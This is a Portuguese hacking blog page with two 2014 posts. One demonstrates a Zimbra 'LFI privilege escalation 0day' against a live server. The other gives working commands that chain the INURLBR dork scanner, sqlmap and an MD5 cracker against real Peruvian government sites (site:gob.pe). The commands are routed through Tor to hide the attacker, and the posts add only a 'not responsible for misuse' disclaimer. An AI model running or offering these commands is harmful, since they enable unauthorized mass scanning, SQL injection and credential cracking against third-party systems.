Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

Mostrando postagens com marcador #InurlBR #OS_Parrot #VideoAula. Mostrar todas as postagens
Mostrando postagens com marcador #InurlBR #OS_Parrot #VideoAula. Mostrar todas as postagens

quarta-feira, 6 de agosto de 2014

SCANNER INURLBR + Zimbra - Privilegie Escalation via LFI (0day)

0xEXPLOIT ZIMBRA

 Demonstração na pratica utilizando o Scanner INURLBR juntamente com Zimbra 0day exploit.  Lembrando que nenhum dado do servidor acessado foi alterado, apenas compartilhando conhecimento.  Não me responsabilizou pelo seu mau uso.

Demonstração na pratica utilizando o Scanner INURLBR juntamente com Zimbra 0day exploit.
Lembrando que nenhum dado do servidor acessado foi alterado, apenas compartilhando conhecimento.
Não me responsabilizou pelo seu mau uso.


http://www.exploit-db.com/exploits/30085/
http://securityattack.com.br/emails-do-governo-igrejas-e-empresas-vulneraveis-em-ano-de-eleicao/

Até a próxima!!!

terça-feira, 29 de julho de 2014

Vídeo Aula - Script InurlBr + SQLMAP + DecrypterMD5


Uma simples demonstração de funcionamento do SCANNER INURLBR junto com SQLMAP e DECRYPTERMD5.


 Comandos utilizado:

php inurlbr.php --dork 'inurl:especialidades.php?id= site:gob.pe' --exploit-get '%27' -q 6 -s inurl_result.txt -p socks5://[email protected]:9050 --tor-random

Opções:

--dork = Define a dork que sera utilizada nos motores de busca
--exploit-get = Define o exploit via get, que será injetado em cada URL encontrada
-q = Define o motor de busca (ex.: google, bing, yahoo e etc...)
-s = Define o arquivo de saída, onde será armazenada as URLS encontradas
-p = Define o proxy para manter o anomimato
--tor-random = Habilita a função do tor randomico, a cada execução do script, o TOR muda de IP

Maiores detalhes:
https://github.com/googleinurl/SCANNER-INURLBR

Comando SQLMAP:
sqlmap --tor --tor-type=SOCKS5 -u http://sitevull.gob.pe/ --current-db --time-sec 10

Para utilizar o parametro "--tor" é necessário que esteja rodando localmente na porta 9050

Parrot e derivados: # service tor start

Verificar se está rodando: # netstat -an | grep 9050

tcp        0      0 127.0.0.1:9050          0.0.0.0:*               LISTEN


Comando utilizado DECRYPTERMD5:

php md5.php --md5 HASH --proxy socks5://[email protected]:9050

Opções:

--md5 = Informando o tipo do HASH
--proxy = Ativando o proxy para anomimato

Para maiores informações utilize: # php md5.php --help

É isso ai ;-)